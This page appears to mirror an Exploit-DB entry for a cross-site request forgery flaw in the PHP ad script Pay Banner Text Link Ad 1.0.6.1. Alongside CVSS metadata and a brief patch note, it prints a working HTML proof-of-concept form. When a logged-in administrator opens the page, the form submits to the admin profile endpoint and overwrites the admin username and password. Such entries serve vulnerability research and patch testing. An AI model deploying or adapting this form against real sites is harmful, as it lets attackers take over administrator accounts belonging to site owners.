header-logo
Suggest Exploit
vendor:
Pay Banner Text Link Ad
by:
Ihsan Sencan
7,5
CVSS
HIGH
Cross-Site Request Forgery
352
CWE
Product Name: Pay Banner Text Link Ad
Affected Version From: 1.0.6.1
Affected Version To: 1.0.6.1
Patch Exists: YES
Related CWE: N/A
CPE: a:dijiteol:pay_banner_text_link_ad:1.0.6.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2017

Pay Banner Text Link Ad 1.0.6.1 – Cross-Site Request Forgery (Update Admin User&Pass)

A Cross-Site Request Forgery (CSRF) vulnerability exists in Pay Banner Text Link Ad 1.0.6.1, which allows an attacker to update the admin username and password. An attacker can craft a malicious HTML page that contains a form with the username and password fields pre-filled with the desired values. When an authenticated admin user visits the malicious page, the form will be automatically submitted, allowing the attacker to update the admin credentials.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to update to the latest version of the software.
Source

Exploit-DB raw data:

# # # # # 
# Exploit Title: Pay Banner Text Link Ad 1.0.6.1 - Cross-Site Request Forgery (Update Admin User&Pass)
# Dork: N/A
# Date: 06.09.2017
# Vendor Homepage: http://www.dijiteol.com/
# Software Link: http://www.dijiteol.com/p-Pay-Banner-Textlink-Ad-Pay-Banner-Advertisement-PHP-Script-i-1.html
# Demo: http://dijiteol.com/demos/pbtla
# Version: 1.0.6.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# 
# Proof of Concept:
<html>
<body>
<form method="post" action="http://localhost/[PATH]/admin/editpersonal.php">
<!--Change admin username-->
<input name="login" type="text" size="20" maxlength="15" value="admin">
<!--Change admin password-->
<input name="pass" type="text" class="keyboardInput" size="20" maxlength="15" value="efe">
<input type="submit" name="Submit" value="Update">
</form>
</body>
</html>
# # # # #